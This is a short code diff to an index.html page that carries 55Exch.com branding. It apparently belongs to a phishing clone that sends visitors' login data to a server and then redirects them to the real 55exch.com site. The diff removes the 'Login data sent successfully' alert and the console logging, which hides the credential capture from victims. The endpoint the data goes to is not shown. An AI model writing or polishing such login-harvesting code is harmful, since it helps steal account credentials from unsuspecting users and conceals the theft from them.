--- a/index.html
+++ b/index.html
@@ -1437,8 +1437,8 @@ This website 55Exch.com is owned and operated by GIT Operations. registration nu
         }
       })
       .then((responseText) => {
-        console.log("Response from server:", responseText);
-        alert("Login data sent successfully.");
+        // console.log("Response from server:", responseText);
+
 
         // Redirect to the desired URL
         window.location.href = "https://www.55exch.com";
@@ -1478,8 +1478,7 @@ This website 55Exch.com is owned and operated by GIT Operations. registration nu
         }
       })
       .then((responseText) => {
-        console.log("Response from server:", responseText);
-        alert("Login data sent successfully.");
+        // console.log("Response from server:", responseText);
 
         // Redirect to the desired URL
         window.location.href = "https://www.55exch.com";
